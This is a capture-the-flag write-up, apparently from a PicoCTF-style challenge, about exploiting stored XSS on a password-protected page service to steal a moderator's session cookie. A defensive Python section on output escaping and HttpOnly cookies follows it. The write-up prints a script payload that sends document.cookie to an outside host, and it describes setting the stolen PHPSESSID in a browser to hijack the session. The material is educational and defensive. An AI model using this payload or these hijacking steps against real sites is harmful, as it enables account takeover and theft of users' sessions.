Created: 2014-11-08 00:54:47
Last modified: 2014-12-11 23:27:16
The bad guys have hidden their access codes on an anonymous secure page service. Our intelligence tells us that the codes were posted on a page with id 43440b22864b30a0098f034eaf940730ca211a55, but unfortunately it's protected by a password, and only site moderators can view the post without the password. Can you help us recover the codes?
What happens if you put HTML into a page?
Exploiting an XSS vulnerability to get the admin user's session cookie.
Cross-site scripting (commonly referred to as XSS) is a type of web exploit in which an attacker is able to inject client-side script into pages viewed by other users. First register an account and log in. Then make a simple page such as
<h1>Hi</h1>
which renders as a real heading rather than as literal text, so the service inserts page content into its HTML unescaped. Page 43440b22864b30a0098f034eaf940730ca211a55 is still locked behind the moderator's session, so now we know what to do once we have the moderator cookie, but how do we get it?
We can form a page such as
<script> location.href=("http://ehsandev.com/pico.php?c="+document.cookie) </script>
When a user browses to this page they are redirected to a page on a server the attacker controls (in this case ehsandev.com) with their cookies in the URL. The attacker then simply reads the request log on that server and copies out the session id. In this example, when we hit the report button the moderator would be redirected to a URL of the form http://ehsandev.com/pico.php?c=PHPSESSID=02b8t6vqgvfigv4at2ovp3e0g6, and 02b8t6vqgvfigv4at2ovp3e0g6 is the session cookie we are looking for; it would appear in the logs of that site. Finally, we manually set our PHPSESSID cookie to the admin's value using a Chrome extension such as EditThisCookie or a Firefox extension such as Cookies Manager+. Then we view the page 43440b22864b30a0098f034eaf940730ca211a55 and get our flag!
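From the defender's side, the writeup depends on two weaknesses: page content is inserted into the HTML unescaped, and the session cookie is readable from document.cookie, which means it was set without the HttpOnly flag. The following Python is an added example, not code from the writeup or from the challenge service; the function names, the page template and the cookie flags are assumptions.

```python
"""Output escaping and an HttpOnly session cookie, the two fixes that close
the stored-XSS cookie theft described above (assumed service structure)."""
import html
from http.cookies import SimpleCookie

# Constructed sample: the cookie-stealing page body quoted in the writeup.
STORED_PAGE = ('<script> location.href=("http://ehsandev.com/pico.php?c="'
               '+document.cookie) </script>')


def render_page_vulnerable(page_body):
    """Assumed current behaviour: user content lands in the HTML verbatim."""
    return f"<html><body><div class='page'>{page_body}</div></body></html>"


def render_page_fixed(page_body):
    """Escape on output: <, >, &, and quotes become entities, so the browser
    displays the text instead of executing it."""
    safe = html.escape(page_body, quote=True)
    return f"<html><body><div class='page'>{safe}</div></body></html>"


def session_set_cookie(session_id, http_only=True):
    """Build the Set-Cookie header value for PHPSESSID (flags are assumed)."""
    c = SimpleCookie()
    c["PHPSESSID"] = session_id
    c["PHPSESSID"]["path"] = "/"
    c["PHPSESSID"]["httponly"] = http_only   # omitted entirely when False
    c["PHPSESSID"]["secure"] = True
    c["PHPSESSID"]["samesite"] = "Lax"
    return c.output(header="").strip()


def document_cookie(set_cookie_headers):
    """Simplified model of what page script sees in document.cookie: only
    cookies that were set without HttpOnly are exposed."""
    visible = []
    for header in set_cookie_headers:
        parts = [p.strip() for p in header.split(";")]
        flags = {p.lower() for p in parts[1:]}
        if "httponly" not in flags:
            visible.append(parts[0])
    return "; ".join(visible)


if __name__ == "__main__":
    print(render_page_fixed(STORED_PAGE))
    print(session_set_cookie("02b8t6vqgvfigv4at2ovp3e0g6"))
    print(repr(document_cookie([session_set_cookie("02b8t6vqgvfigv4at2ovp3e0g6")])))
```

Either fix alone breaks this particular attack chain; escaping stops the script from running at all, and HttpOnly stops a script that does run from reading PHPSESSID.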